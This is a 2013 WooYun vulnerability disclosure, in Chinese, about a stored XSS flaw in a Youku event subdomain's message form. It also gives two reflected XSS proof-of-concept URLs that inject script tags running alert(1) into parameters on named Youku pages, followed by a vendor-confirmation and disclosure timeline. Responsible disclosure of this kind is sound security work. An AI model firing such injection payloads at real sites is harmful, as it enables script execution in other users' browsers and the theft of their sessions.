优酷某分站存储型XSS漏洞

编号31933
Urlhttp://www.wooyun.org/bug.php?action=view&id=31933
漏洞状态厂商已经确认
漏洞标题优酷某分站存储型XSS漏洞
漏洞类型XSS跨站脚本攻击
厂商优酷
白帽子1ee
提交日期2013-07-23 15:12:00
公开日期2013-09-06 15:12:00
修复时间(not set)
确认时间2013-07-23 00:00:00
Confirm Spend0
漏洞标签反射型xss 持久型xss
关注数0
收藏数0
白帽评级
白帽自评rank8
厂商评级
厂商评rank10
漏洞简介
看见xss_art 搞XSS 我也来凑热闹 
漏洞细节

XSS :http://events.youku.com/crowneplaza/dreams.php?target=1
你的梦想留言处插入

</textarea><XSS代码>


QQ截图20130723125927.png


另外送几个反射XSS

http://event.youku.com/tsingtaobeer/search.php?swd=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit.x=0&submit.y=0
http://ilovenet.youku.com/list.php?page=1%2b%3Cscript%3Ealert%281%29;%3C/script%3E

POC

QQ截图20130723125927.png


http://event.youku.com/tsingtaobeer/search.php?swd=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit.x=0&submit.y=0
http://ilovenet.youku.com/list.php?page=1%2b%3Cscript%3Ealert%281%29;%3C/script%3E

修复方案

你们更专业

状态信息 2013-07-23: 细节已通知厂商并且等待厂商处理中
2013-07-23: 厂商已经确认,细节仅向厂商公开
2013-08-02: 细节向核心白帽子及相关领域专家公开
2013-08-12: 细节向普通白帽子公开
2013-08-22: 细节向实习白帽子公开
2013-09-06: 细节向公众公开
厂商回复修复中
回应信息危害等级:中漏洞Rank:10 确认时间:2013-07-23 16:22
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

这个我提的还要早一点,那个1和11就是我搞的,看来你跟审核的关系深些

feng02013-07-29 16:37:00